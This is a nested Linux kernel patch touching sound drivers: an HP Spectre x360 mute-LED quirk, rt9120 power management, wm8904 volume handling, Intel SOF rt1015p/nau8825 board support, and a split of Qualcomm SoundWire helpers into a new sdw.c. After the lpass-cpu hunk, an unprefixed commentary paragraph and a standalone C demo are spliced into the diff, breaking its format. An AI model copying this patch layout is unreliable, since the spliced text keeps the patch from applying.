+ static void alc236_fixup_hp_coef_micmute_led(struct hda_codec *codec,
+ 				const struct hda_fixup *fix, int action)
+ {
+@@ -4665,6 +4677,13 @@ static void alc285_fixup_hp_mute_led(struct hda_codec *codec,
+ 	alc285_fixup_hp_coef_micmute_led(codec, fix, action);
+ }
+ 
++static void alc285_fixup_hp_spectre_x360_mute_led(struct hda_codec *codec,
++				const struct hda_fixup *fix, int action)
++{
++	alc285_fixup_hp_mute_led_coefbit(codec, fix, action);
++	alc285_fixup_hp_gpio_micmute_led(codec, fix, action);
++}
++
+ static void alc236_fixup_hp_mute_led(struct hda_codec *codec,
+ 				const struct hda_fixup *fix, int action)
+ {
+@@ -7106,6 +7125,7 @@ enum {
+ 	ALC285_FIXUP_ASUS_G533Z_PINS,
+ 	ALC285_FIXUP_HP_GPIO_LED,
+ 	ALC285_FIXUP_HP_MUTE_LED,
++	ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED,
+ 	ALC236_FIXUP_HP_GPIO_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
+@@ -8486,6 +8506,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_mute_led,
+ 	},
++	[ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_hp_spectre_x360_mute_led,
++	},
+ 	[ALC236_FIXUP_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_gpio_led,
+@@ -9328,6 +9352,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x86c7, "HP Envy AiO 32", ALC274_FIXUP_HP_ENVY_GPIO),
+ 	SND_PCI_QUIRK(0x103c, 0x86e7, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
+ 	SND_PCI_QUIRK(0x103c, 0x86e8, "HP Spectre x360 15-eb0xxx", ALC285_FIXUP_HP_SPECTRE_X360_EB1),
++	SND_PCI_QUIRK(0x103c, 0x86f9, "HP Spectre x360 13-aw0xxx", ALC285_FIXUP_HP_SPECTRE_X360_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8716, "HP Elite Dragonfly G2 Notebook PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8720, "HP EliteBook x360 1040 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8724, "HP EliteBook 850 G7", ALC285_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/rt9120.c b/sound/soc/codecs/rt9120.c
+index 644300e88b4c5..fcf4fbaed3c76 100644
+--- a/sound/soc/codecs/rt9120.c
++++ b/sound/soc/codecs/rt9120.c
+@@ -177,8 +177,20 @@ static int rt9120_codec_probe(struct snd_soc_component *comp)
+ 	return 0;
+ }
+ 
++static int rt9120_codec_suspend(struct snd_soc_component *comp)
++{
++	return pm_runtime_force_suspend(comp->dev);
++}
++
++static int rt9120_codec_resume(struct snd_soc_component *comp)
++{
++	return pm_runtime_force_resume(comp->dev);
++}
++
+ static const struct snd_soc_component_driver rt9120_component_driver = {
+ 	.probe = rt9120_codec_probe,
++	.suspend = rt9120_codec_suspend,
++	.resume = rt9120_codec_resume,
+ 	.controls = rt9120_snd_controls,
+ 	.num_controls = ARRAY_SIZE(rt9120_snd_controls),
+ 	.dapm_widgets = rt9120_dapm_widgets,
+diff --git a/sound/soc/codecs/wm8904.c b/sound/soc/codecs/wm8904.c
+index ca6a01a230af4..791d8738d1c0e 100644
+--- a/sound/soc/codecs/wm8904.c
++++ b/sound/soc/codecs/wm8904.c
+@@ -697,6 +697,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 	int dcs_mask;
+ 	int dcs_l, dcs_r;
+ 	int dcs_l_reg, dcs_r_reg;
++	int an_out_reg;
+ 	int timeout;
+ 	int pwr_reg;
+ 
+@@ -712,6 +713,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		dcs_mask = WM8904_DCS_ENA_CHAN_0 | WM8904_DCS_ENA_CHAN_1;
+ 		dcs_r_reg = WM8904_DC_SERVO_8;
+ 		dcs_l_reg = WM8904_DC_SERVO_9;
++		an_out_reg = WM8904_ANALOGUE_OUT1_LEFT;
+ 		dcs_l = 0;
+ 		dcs_r = 1;
+ 		break;
+@@ -720,6 +722,7 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		dcs_mask = WM8904_DCS_ENA_CHAN_2 | WM8904_DCS_ENA_CHAN_3;
+ 		dcs_r_reg = WM8904_DC_SERVO_6;
+ 		dcs_l_reg = WM8904_DC_SERVO_7;
++		an_out_reg = WM8904_ANALOGUE_OUT2_LEFT;
+ 		dcs_l = 2;
+ 		dcs_r = 3;
+ 		break;
+@@ -792,6 +795,10 @@ static int out_pga_event(struct snd_soc_dapm_widget *w,
+ 		snd_soc_component_update_bits(component, reg,
+ 				    WM8904_HPL_ENA_OUTP | WM8904_HPR_ENA_OUTP,
+ 				    WM8904_HPL_ENA_OUTP | WM8904_HPR_ENA_OUTP);
++
++		/* Update volume, requires PGA to be powered */
++		val = snd_soc_component_read(component, an_out_reg);
++		snd_soc_component_write(component, an_out_reg, val);
+ 		break;
+ 
+ 	case SND_SOC_DAPM_POST_PMU:
+diff --git a/sound/soc/intel/boards/Kconfig b/sound/soc/intel/boards/Kconfig
+index aa12d7e3dd2f9..ca49cc49c378c 100644
+--- a/sound/soc/intel/boards/Kconfig
++++ b/sound/soc/intel/boards/Kconfig
+@@ -558,6 +558,7 @@ config SND_SOC_INTEL_SOF_NAU8825_MACH
+ 	select SND_SOC_HDAC_HDMI
+ 	select SND_SOC_INTEL_HDA_DSP_COMMON
+ 	select SND_SOC_INTEL_SOF_MAXIM_COMMON
++	select SND_SOC_INTEL_SOF_REALTEK_COMMON
+ 	help
+ 	   This adds support for ASoC machine driver for SOF platforms
+ 	   with nau8825 codec.
+diff --git a/sound/soc/intel/boards/sof_nau8825.c b/sound/soc/intel/boards/sof_nau8825.c
+index 5585c217f78d3..009a41fbefa10 100644
+--- a/sound/soc/intel/boards/sof_nau8825.c
++++ b/sound/soc/intel/boards/sof_nau8825.c
+@@ -47,6 +47,7 @@
+ #define SOF_RT1019P_SPEAKER_AMP_PRESENT	BIT(14)
+ #define SOF_MAX98373_SPEAKER_AMP_PRESENT	BIT(15)
+ #define SOF_MAX98360A_SPEAKER_AMP_PRESENT	BIT(16)
++#define SOF_RT1015P_SPEAKER_AMP_PRESENT	BIT(17)
+ 
+ static unsigned long sof_nau8825_quirk = SOF_NAU8825_SSP_CODEC(0);
+ 
+@@ -483,6 +484,8 @@ static struct snd_soc_dai_link *sof_card_dai_links_create(struct device *dev,
+ 		} else if (sof_nau8825_quirk &
+ 				SOF_MAX98360A_SPEAKER_AMP_PRESENT) {
+ 			max_98360a_dai_link(&links[id]);
++		} else if (sof_nau8825_quirk & SOF_RT1015P_SPEAKER_AMP_PRESENT) {
++			sof_rt1015p_dai_link(&links[id]);
+ 		} else {
+ 			goto devm_err;
+ 		}
+@@ -576,6 +579,8 @@ static int sof_audio_probe(struct platform_device *pdev)
+ 
+ 	if (sof_nau8825_quirk & SOF_MAX98373_SPEAKER_AMP_PRESENT)
+ 		max_98373_set_codec_conf(&sof_audio_card_nau8825);
++	else if (sof_nau8825_quirk & SOF_RT1015P_SPEAKER_AMP_PRESENT)
++		sof_rt1015p_codec_conf(&sof_audio_card_nau8825);
+ 
+ 	if (sof_nau8825_quirk & SOF_SSP_BT_OFFLOAD_PRESENT)
+ 		sof_audio_card_nau8825.num_links++;
+@@ -613,7 +618,7 @@ static const struct platform_device_id board_ids[] = {
+ 
+ 	},
+ 	{
+-		.name = "adl_rt1019p_nau8825",
++		.name = "adl_rt1019p_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
+ 					SOF_RT1019P_SPEAKER_AMP_PRESENT |
+@@ -621,7 +626,7 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_NAU8825_NUM_HDMIDEV(4)),
+ 	},
+ 	{
+-		.name = "adl_max98373_nau8825",
++		.name = "adl_max98373_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
+ 					SOF_MAX98373_SPEAKER_AMP_PRESENT |
+@@ -632,7 +637,7 @@ static const struct platform_device_id board_ids[] = {
+ 	},
+ 	{
+ 		/* The limitation of length of char array, shorten the name */
+-		.name = "adl_mx98360a_nau8825",
++		.name = "adl_mx98360a_8825",
+ 		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
+ 					SOF_SPEAKER_AMP_PRESENT |
+ 					SOF_MAX98360A_SPEAKER_AMP_PRESENT |
+@@ -642,6 +647,16 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 
+ 	},
++	{
++		.name = "adl_rt1015p_8825",
++		.driver_data = (kernel_ulong_t)(SOF_NAU8825_SSP_CODEC(0) |
++					SOF_SPEAKER_AMP_PRESENT |
++					SOF_RT1015P_SPEAKER_AMP_PRESENT |
++					SOF_NAU8825_SSP_AMP(1) |
++					SOF_NAU8825_NUM_HDMIDEV(4) |
++					SOF_BT_OFFLOAD_SSP(2) |
++					SOF_SSP_BT_OFFLOAD_PRESENT),
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(platform, board_ids);
+@@ -663,3 +678,4 @@ MODULE_AUTHOR("Mac Chiang <mac.chiang@intel.com>");
+ MODULE_LICENSE("GPL");
+ MODULE_IMPORT_NS(SND_SOC_INTEL_HDA_DSP_COMMON);
+ MODULE_IMPORT_NS(SND_SOC_INTEL_SOF_MAXIM_COMMON);
++MODULE_IMPORT_NS(SND_SOC_INTEL_SOF_REALTEK_COMMON);
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 9990d5502d264..68b4fa352354d 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -430,6 +430,11 @@ static const struct snd_soc_acpi_codecs adl_rt5682_rt5682s_hp = {
+ 	.codecs = {"10EC5682", "RTL5682"},
+ };
+ 
++static const struct snd_soc_acpi_codecs adl_rt1015p_amp = {
++	.num_codecs = 1,
++	.codecs = {"RTL1015"}
++};
++
+ static const struct snd_soc_acpi_codecs adl_rt1019p_amp = {
+ 	.num_codecs = 1,
+ 	.codecs = {"RTL1019"}
+@@ -469,21 +474,21 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_rt1019p_nau8825",
++		.drv_name = "adl_rt1019p_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_rt1019p_amp,
+ 		.sof_tplg_filename = "sof-adl-rt1019-nau8825.tplg",
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_max98373_nau8825",
++		.drv_name = "adl_max98373_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_max98373_amp,
+ 		.sof_tplg_filename = "sof-adl-max98373-nau8825.tplg",
+ 	},
+ 	{
+ 		.id = "10508825",
+-		.drv_name = "adl_mx98360a_nau8825",
++		.drv_name = "adl_mx98360a_8825",
+ 		.machine_quirk = snd_soc_acpi_codec_list,
+ 		.quirk_data = &adl_max98360a_amp,
+ 		.sof_tplg_filename = "sof-adl-max98360a-nau8825.tplg",
+@@ -495,6 +500,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 		.quirk_data = &adl_rt1019p_amp,
+ 		.sof_tplg_filename = "sof-adl-rt1019-rt5682.tplg",
+ 	},
++	{
++		.id = "10508825",
++		.drv_name = "adl_rt1015p_8825",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &adl_rt1015p_amp,
++		.sof_tplg_filename = "sof-adl-rt1015-nau8825.tplg",
++	},
+ 	{
+ 		.id = "10508825",
+ 		.drv_name = "sof_nau8825",
+diff --git a/sound/soc/qcom/Kconfig b/sound/soc/qcom/Kconfig
+index 96a6d4731e6fd..e7b00d1d9e99f 100644
+--- a/sound/soc/qcom/Kconfig
++++ b/sound/soc/qcom/Kconfig
+@@ -2,7 +2,6 @@
+ menuconfig SND_SOC_QCOM
+ 	tristate "ASoC support for QCOM platforms"
+ 	depends on ARCH_QCOM || COMPILE_TEST
+-	imply SND_SOC_QCOM_COMMON
+ 	help
+ 	  Say Y or M if you want to add support to use audio devices
+ 	  in Qualcomm Technologies SOC-based platforms.
+@@ -60,14 +59,16 @@ config SND_SOC_STORM
+ config SND_SOC_APQ8016_SBC
+ 	tristate "SoC Audio support for APQ8016 SBC platforms"
+ 	select SND_SOC_LPASS_APQ8016
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8016 SOC-based systems.
+ 	  Say Y if you want to use audio devices on MI2S.
+ 
+ config SND_SOC_QCOM_COMMON
+-	depends on SOUNDWIRE
++	tristate
++
++config SND_SOC_QCOM_SDW
+ 	tristate
+ 
+ config SND_SOC_QDSP6_COMMON
+@@ -144,7 +145,7 @@ config SND_SOC_MSM8996
+ 	depends on QCOM_APR
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	help
+ 	  Support for Qualcomm Technologies LPASS audio block in
+ 	  APQ8096 SoC-based systems.
+@@ -155,7 +156,7 @@ config SND_SOC_SDM845
+ 	depends on QCOM_APR && I2C && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_RT5663
+ 	select SND_SOC_MAX98927
+ 	imply SND_SOC_CROS_EC_CODEC
+@@ -169,7 +170,8 @@ config SND_SOC_SM8250
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_SDW
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SM8250 SoC-based systems.
+@@ -180,7 +182,8 @@ config SND_SOC_SC8280XP
+ 	depends on QCOM_APR && SOUNDWIRE
+ 	depends on COMMON_CLK
+ 	select SND_SOC_QDSP6
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_SDW
+ 	help
+ 	  To add support for audio on Qualcomm Technologies Inc.
+ 	  SC8280XP SoC-based systems.
+@@ -190,7 +193,7 @@ config SND_SOC_SC7180
+ 	tristate "SoC Machine driver for SC7180 boards"
+ 	depends on I2C && GPIOLIB
+ 	depends on SOUNDWIRE || SOUNDWIRE=n
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7180
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_RT5682_I2C
+@@ -204,7 +207,7 @@ config SND_SOC_SC7180
+ config SND_SOC_SC7280
+ 	tristate "SoC Machine driver for SC7280 boards"
+ 	depends on I2C && SOUNDWIRE
+-	depends on SND_SOC_QCOM_COMMON
++	select SND_SOC_QCOM_COMMON
+ 	select SND_SOC_LPASS_SC7280
+ 	select SND_SOC_MAX98357A
+ 	select SND_SOC_WCD938X_SDW
+diff --git a/sound/soc/qcom/Makefile b/sound/soc/qcom/Makefile
+index 8b97172cf990f..254350d9dc069 100644
+--- a/sound/soc/qcom/Makefile
++++ b/sound/soc/qcom/Makefile
+@@ -28,6 +28,7 @@ snd-soc-sdm845-objs := sdm845.o
+ snd-soc-sm8250-objs := sm8250.o
+ snd-soc-sc8280xp-objs := sc8280xp.o
+ snd-soc-qcom-common-objs := common.o
++snd-soc-qcom-sdw-objs := sdw.o
+ 
+ obj-$(CONFIG_SND_SOC_STORM) += snd-soc-storm.o
+ obj-$(CONFIG_SND_SOC_APQ8016_SBC) += snd-soc-apq8016-sbc.o
+@@ -38,6 +39,7 @@ obj-$(CONFIG_SND_SOC_SC8280XP) += snd-soc-sc8280xp.o
+ obj-$(CONFIG_SND_SOC_SDM845) += snd-soc-sdm845.o
+ obj-$(CONFIG_SND_SOC_SM8250) += snd-soc-sm8250.o
+ obj-$(CONFIG_SND_SOC_QCOM_COMMON) += snd-soc-qcom-common.o
++obj-$(CONFIG_SND_SOC_QCOM_SDW) += snd-soc-qcom-sdw.o
+ 
+ #DSP lib
+ obj-$(CONFIG_SND_SOC_QDSP6) += qdsp6/
+diff --git a/sound/soc/qcom/common.c b/sound/soc/qcom/common.c
+index 49c74c1662a3f..96fe80241fb41 100644
+--- a/sound/soc/qcom/common.c
++++ b/sound/soc/qcom/common.c
+@@ -180,120 +180,6 @@ err_put_np:
+ }
+ EXPORT_SYMBOL_GPL(qcom_snd_parse_of);
+ 
+-int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime,
+-			 bool *stream_prepared)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-	int ret;
+-
+-	if (!sruntime)
+-		return 0;
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case WSA_CODEC_DMA_RX_1:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		break;
+-	default:
+-		return 0;
+-	}
+-
+-	if (*stream_prepared) {
+-		sdw_disable_stream(sruntime);
+-		sdw_deprepare_stream(sruntime);
+-		*stream_prepared = false;
+-	}
+-
+-	ret = sdw_prepare_stream(sruntime);
+-	if (ret)
+-		return ret;
+-
+-	/**
+-	 * NOTE: there is a strict hw requirement about the ordering of port
+-	 * enables and actual WSA881x PA enable. PA enable should only happen
+-	 * after soundwire ports are enabled if not DC on the line is
+-	 * accumulated resulting in Click/Pop Noise
+-	 * PA enable/mute are handled as part of codec DAPM and digital mute.
+-	 */
+-
+-	ret = sdw_enable_stream(sruntime);
+-	if (ret) {
+-		sdw_deprepare_stream(sruntime);
+-		return ret;
+-	}
+-	*stream_prepared  = true;
+-
+-	return ret;
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_prepare);
+-
+-int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-			   struct snd_pcm_hw_params *params,
+-			   struct sdw_stream_runtime **psruntime)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *codec_dai;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-	struct sdw_stream_runtime *sruntime;
+-	int i;
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		for_each_rtd_codec_dais(rtd, i, codec_dai) {
+-			sruntime = snd_soc_dai_get_stream(codec_dai, substream->stream);
+-			if (sruntime != ERR_PTR(-ENOTSUPP))
+-				*psruntime = sruntime;
+-		}
+-		break;
+-	}
+-
+-	return 0;
+-
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_params);
+-
+-int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime, bool *stream_prepared)
+-{
+-	struct snd_soc_pcm_runtime *rtd = substream->private_data;
+-	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
+-
+-	switch (cpu_dai->id) {
+-	case WSA_CODEC_DMA_RX_0:
+-	case WSA_CODEC_DMA_RX_1:
+-	case RX_CODEC_DMA_RX_0:
+-	case RX_CODEC_DMA_RX_1:
+-	case TX_CODEC_DMA_TX_0:
+-	case TX_CODEC_DMA_TX_1:
+-	case TX_CODEC_DMA_TX_2:
+-	case TX_CODEC_DMA_TX_3:
+-		if (sruntime && *stream_prepared) {
+-			sdw_disable_stream(sruntime);
+-			sdw_deprepare_stream(sruntime);
+-			*stream_prepared = false;
+-		}
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
+-
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup)
+ {
+diff --git a/sound/soc/qcom/common.h b/sound/soc/qcom/common.h
+index 3ef5bb6d12df7..d7f80ee5ae26a 100644
+--- a/sound/soc/qcom/common.h
++++ b/sound/soc/qcom/common.h
+@@ -5,19 +5,9 @@
+ #define __QCOM_SND_COMMON_H__
+ 
+ #include <sound/soc.h>
+-#include <linux/soundwire/sdw.h>
+ 
+ int qcom_snd_parse_of(struct snd_soc_card *card);
+ int qcom_snd_wcd_jack_setup(struct snd_soc_pcm_runtime *rtd,
+ 			    struct snd_soc_jack *jack, bool *jack_setup);
+ 
+-int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *runtime,
+-			 bool *stream_prepared);
+-int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
+-			   struct snd_pcm_hw_params *params,
+-			   struct sdw_stream_runtime **psruntime);
+-int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
+-			 struct sdw_stream_runtime *sruntime,
+-			 bool *stream_prepared);
+ #endif
+diff --git a/sound/soc/qcom/lpass-cpu.c b/sound/soc/qcom/lpass-cpu.c
+index 54353842dc07f..dbdaaa85ce481 100644
+--- a/sound/soc/qcom/lpass-cpu.c
++++ b/sound/soc/qcom/lpass-cpu.c
+@@ -1037,10 +1037,11 @@ static void of_lpass_cpu_parse_dai_data(struct device *dev,
+ 					struct lpass_data *data)
+ {
+ 	struct device_node *node;
+-	int ret, id;
++	int ret, i, id;
+ 
+ 	/* Allow all channels by default for backwards compatibility */
+-	for (id = 0; id < data->variant->num_dai; id++) {
++	for (i = 0; i < data->variant->num_dai; i++) {
++		id = data->variant->dai_driver[i].id;
+ 		data->mi2s_playback_sd_mode[id] = LPAIF_I2SCTL_MODE_8CH;
+ 		data->mi2s_capture_sd_mode[id] = LPAIF_I2SCTL_MODE_8CH;
+ 	}
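
The lpass-cpu fix distinguishes array position from DAI id: the per-id sd_mode tables must be indexed by each dai_driver entry's own .id, which need not be contiguous with the loop index. The shape of the fix, with illustrative types:

/*
 * The loop index is a position in the dai array; the per-id table is
 * indexed by the entry's own .id, which can be sparse.
 */
#include <stdio.h>

struct dai { int id; };

int main(void)
{
	struct dai dais[] = { { 0 }, { 4 }, { 7 } };   /* sparse ids */
	int mode[8] = { 0 };

	for (unsigned i = 0; i < sizeof(dais) / sizeof(dais[0]); i++)
		mode[dais[i].id] = 8;   /* LPAIF_I2SCTL_MODE_8CH stand-in */

	for (int id = 0; id < 8; id++)
		printf("mode[%d]=%d\n", id, mode[id]);
	return 0;
}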
+diff --git a/sound/soc/qcom/sc8280xp.c b/sound/soc/qcom/sc8280xp.c
+index ade44ad7c585a..14d9fea33d16a 100644
+--- a/sound/soc/qcom/sc8280xp.c
++++ b/sound/soc/qcom/sc8280xp.c
+@@ -12,6 +12,7 @@
+ #include <linux/input-event-codes.h>
+ #include "qdsp6/q6afe.h"
+ #include "common.h"
++#include "sdw.h"
+ 
+ #define DRIVER_NAME		"sc8280xp"
+ 
+diff --git a/sound/soc/qcom/sdw.c b/sound/soc/qcom/sdw.c
+new file mode 100644
+index 0000000000000..10249519a39e5
+--- /dev/null
++++ b/sound/soc/qcom/sdw.c
+@@ -0,0 +1,123 @@
++// SPDX-License-Identifier: GPL-2.0
++// Copyright (c) 2018, Linaro Limited.
++// Copyright (c) 2018, The Linux Foundation. All rights reserved.
++
++#include <linux/module.h>
++#include <sound/soc.h>
++#include "qdsp6/q6afe.h"
++#include "sdw.h"
++
++int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime,
++			 bool *stream_prepared)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++	int ret;
++
++	if (!sruntime)
++		return 0;
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case WSA_CODEC_DMA_RX_1:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		break;
++	default:
++		return 0;
++	}
++
++	if (*stream_prepared) {
++		sdw_disable_stream(sruntime);
++		sdw_deprepare_stream(sruntime);
++		*stream_prepared = false;
++	}
++
++	ret = sdw_prepare_stream(sruntime);
++	if (ret)
++		return ret;
++
++	/**
++	 * NOTE: there is a strict hw requirement about the ordering of port
++	 * enables and the actual WSA881x PA enable. The PA enable should only
++	 * happen after the soundwire ports are enabled; otherwise DC builds up
++	 * on the line, resulting in click/pop noise.
++	 * PA enable/mute are handled as part of codec DAPM and digital mute.
++	 */
++
++	ret = sdw_enable_stream(sruntime);
++	if (ret) {
++		sdw_deprepare_stream(sruntime);
++		return ret;
++	}
++	*stream_prepared = true;
++
++	return ret;
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_prepare);
++
++int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
++			   struct snd_pcm_hw_params *params,
++			   struct sdw_stream_runtime **psruntime)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *codec_dai;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++	struct sdw_stream_runtime *sruntime;
++	int i;
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		for_each_rtd_codec_dais(rtd, i, codec_dai) {
++			sruntime = snd_soc_dai_get_stream(codec_dai, substream->stream);
++			if (sruntime != ERR_PTR(-ENOTSUPP))
++				*psruntime = sruntime;
++		}
++		break;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_params);
++
++int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime, bool *stream_prepared)
++{
++	struct snd_soc_pcm_runtime *rtd = substream->private_data;
++	struct snd_soc_dai *cpu_dai = asoc_rtd_to_cpu(rtd, 0);
++
++	switch (cpu_dai->id) {
++	case WSA_CODEC_DMA_RX_0:
++	case WSA_CODEC_DMA_RX_1:
++	case RX_CODEC_DMA_RX_0:
++	case RX_CODEC_DMA_RX_1:
++	case TX_CODEC_DMA_TX_0:
++	case TX_CODEC_DMA_TX_1:
++	case TX_CODEC_DMA_TX_2:
++	case TX_CODEC_DMA_TX_3:
++		if (sruntime && *stream_prepared) {
++			sdw_disable_stream(sruntime);
++			sdw_deprepare_stream(sruntime);
++			*stream_prepared = false;
++		}
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(qcom_snd_sdw_hw_free);
++MODULE_LICENSE("GPL v2");
+diff --git a/sound/soc/qcom/sdw.h b/sound/soc/qcom/sdw.h
+new file mode 100644
+index 0000000000000..d74cbb84da138
+--- /dev/null
++++ b/sound/soc/qcom/sdw.h
+@@ -0,0 +1,18 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++// Copyright (c) 2018, The Linux Foundation. All rights reserved.
++
++#ifndef __QCOM_SND_SDW_H__
++#define __QCOM_SND_SDW_H__
++
++#include <linux/soundwire/sdw.h>
++
++int qcom_snd_sdw_prepare(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *runtime,
++			 bool *stream_prepared);
++int qcom_snd_sdw_hw_params(struct snd_pcm_substream *substream,
++			   struct snd_pcm_hw_params *params,
++			   struct sdw_stream_runtime **psruntime);
++int qcom_snd_sdw_hw_free(struct snd_pcm_substream *substream,
++			 struct sdw_stream_runtime *sruntime,
++			 bool *stream_prepared);
++#endif
+diff --git a/sound/soc/qcom/sm8250.c b/sound/soc/qcom/sm8250.c
+index 8dbe9ef41b1c9..9626a9ef78c23 100644
+--- a/sound/soc/qcom/sm8250.c
++++ b/sound/soc/qcom/sm8250.c
+@@ -12,6 +12,7 @@
+ #include <linux/input-event-codes.h>
+ #include "qdsp6/q6afe.h"
